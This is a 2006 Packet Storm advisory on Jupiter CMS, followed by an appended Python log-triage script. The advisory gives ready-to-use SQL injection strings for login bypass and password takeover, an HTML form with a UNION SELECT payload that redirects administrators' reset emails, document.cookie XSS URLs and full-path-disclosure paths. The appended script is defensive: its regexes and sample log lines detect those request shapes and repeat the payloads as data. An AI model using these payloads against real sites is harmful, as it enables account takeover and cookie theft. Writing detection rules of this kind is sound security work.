jupiterCMS-sql.txt

2006-09-16T00:00:00
ID PACKETSTORM:50101
Type packetstorm
Reporter HACKERS PAL
Modified 2006-09-16T00:00:00

Description

                                        
`Hello,
  
  
Jupiter CMS SQL injection, full path disclosure and XSS vulnerabilities
  
  
Discovered By : HACKERS PAL  
Copyright : HACKERS PAL
Website : http://www.soqor.net  
Email Address : security@soqor.net  
  
  
If magic_quotes_gpc = off, log in with the user name:
' or id=1/*
or
' or authorization = 4/*

You will be logged in with full permissions.
-------------------------  
index.php?n=modules/register&a=3&d=3&key='%20or%20id=1/*  
You will be able to change the password for any user: find the user's id and put it in the URL.
  
--  
Or you can use this form, changing http://localhost/jupiter/ to the website's directory, to receive the reset password email for all the administrators:
  
<form method="post" action="http://localhost/jupiter/index.php?n=modules/register">  
<table class="main" cellspacing="1" cellpadding="4" width="100%">  
<tr class="head">   
<td colspan="2" class="head">Forgot your password?</td>  
</tr>  
<tr>  
<td class="con1" width="42%" valign="middle"><span class="hilight">Username:</span></td>  
<td class="con1" width="58%" valign="bottom"><input type="text" name="fpwusername" style="width:100%" class="box" tabindex="5" value="' union select id,authorization ,username ,password ,'security@soqor.net',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,calendarbday,status,multikey,actime from users where id=1or authorization=4/*"></td>  
</tr>  
<tr>  
<td class="con1"><input type="button" style="width:100" class="box" value="Back" onClick="window.history.go(-1);" tabindex="8"></td>  
<td class="con1" align="right"><input type="submit" style="width:100" class="box" value="Submit" tabindex="7"></td>  
</tr>  
<input type="hidden" name="a" value="3">  
<input type="hidden" name="d" value="1">  
</table>  
</form>  
  
Put the following as the user name value, changing security@soqor.net to your email:
' union select id,authorization ,username ,password ,'security@soqor.net',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,calendarbday,status,multikey,actime from users where id=1or authorization=4/*  
/********************************************/  
  
Upload any picture to their gallery  
  
modules/galleryuploadfunction.php  
  
picture path will be   
gallery/albums/public/name.ext  
/********************************************/  
  
XSS (cross-site scripting)
  
modules/blocks.php?is_webmaster=2&language[Admin%20name]=<script>alert(document.cookie);</script>  
modules/blocks.php?is_webmaster=2&language[Admin%20back]=<script>alert(document.cookie);</script>  
  
modules/register.php?is_guest=1&language[Register%20title]=<script>alert(document.cookie);</script>  
modules/register.php?is_guest=1&language[Register%20title2]=<script>alert(document.cookie);</script>  
  
modules/mass-email.php?language[Mass-Email%20form%20title]=<script>alert(document.cookie);</script>  
modules/mass-email.php?language[Mass-Email%20form%20desc]=<script>alert(document.cookie);</script>  
modules/mass-email.php?language[Mass-Email%20form%20desc2]=<script>alert(document.cookie);</script>  
Change the value for language[Mass-Email%20form%20desc(2-4)]
  
modules/register.php?is_guest=1&a=3&language[Forgotten%20title]=<script>alert(document.cookie);</script>  
modules/register.php?is_guest=1&a=3&language[Forgotten%20desc]=<script>alert(document.cookie);</script>  
modules/register.php?is_guest=1&a=3&language[Forgotten%20desc2]=<script>alert(document.cookie);</script>  
Change the value for language[Forgotten%20desc(2 - 5)]
  
  
modules/search.php?language[Search%20view%20desc]=<script>alert(document.cookie);</script>  
modules/search.php?language[Search%20view%20desc2]=<script>alert(document.cookie);</script>  
Change the value for language[Search%20view%20desc(2-8)]  
  
/********************************************/  
  
Full path disclosure
includes/functions.php  
  
modules/register.php?is_guest=1  
modules/online.php  
modules/poll.php  
modules/panel.php  
modules/pm.php  
modules/news.php  
modules/templates_change.php  
modules/users.php  
modules/misc.php?a=1&is_webmaster=1  
modules/masspm.php  
modules/mass-email.php?subject_choice=1&message_choice=1&a=1  
modules/main-nav.php  
modules/login.php  
modules/layout.php?is_webmaster=2  
modules/hq.php  
modules/forum.php  
modules/forum-admin.php?n=modules/forum-admin&a=1  
modules/events.php  
modules/emoticons.php  
modules/download.php  
modules/blocks.php?is_webmaster=2  
modules/ban.php  
modules/badwords.php  
modules/ads.php  
modules/admin.php  
  
/********************************************/  
  
WwW.SoQoR.NeT  
`
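
Added example, not part of the original advisory and not Jupiter CMS code: a small access-log triage script that flags the request shapes listed above (direct requests to modules/*.php and includes/functions.php, language[...] and is_webmaster/is_guest passed in the query string, and a quote followed by or/union in a parameter value). The rule names, the log lines and the assumption that legitimate traffic goes through index.php?n=modules/... are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Rules derived from the request shapes listed in the advisory above.
DIRECT = re.compile(r"/(modules/[\w-]+|includes/functions)\.php$")
SQLI = re.compile(r"'\s*(or|union)\b", re.I)
SCRIPT = re.compile(r"<\s*script", re.I)
REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the sorted rule names matched by one request target."""
    parts = urlsplit(target)
    hits = set()
    # Assumption: legitimate traffic is routed through index.php?n=modules/...
    if DIRECT.search(parts.path):
        hits.add("direct-script-access")
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.startswith("language["):
            hits.add("language-array-override")
        if name in ("is_webmaster", "is_guest"):
            hits.add("privilege-flag-override")
        if SQLI.search(value):
            hits.add("sqli-quote-keyword")
        if SCRIPT.search(value):
            hits.add("script-tag-in-param")
    return sorted(hits)

def scan(lines):
    """Return (line_number, rule_names) for every log line that matches a rule."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQ.search(line)
        hits = classify(m.group(1)) if m else []
        if hits:
            findings.append((n, hits))
    return findings

# Constructed sample lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Sep/2006:10:00:00 +0000] "GET /jupiter/index.php?n=modules/news HTTP/1.1" 200 5120',
    '192.0.2.11 - - [16/Sep/2006:10:00:05 +0000] "GET /jupiter/index.php?n=modules/register&a=3&d=3&key=\'%20or%20id=1/* HTTP/1.1" 200 4096',
    '192.0.2.11 - - [16/Sep/2006:10:00:09 +0000] "GET /jupiter/modules/blocks.php?is_webmaster=2&language[Admin%20name]=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 812',
    '192.0.2.12 - - [16/Sep/2006:10:00:12 +0000] "GET /jupiter/modules/poll.php HTTP/1.1" 200 310',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(n, ", ".join(hits))
```

The login and forgotten-password payloads are sent in POST bodies, which a standard access log does not record, so those need request-body logging or a WAF rule on the fpwusername and user name fields.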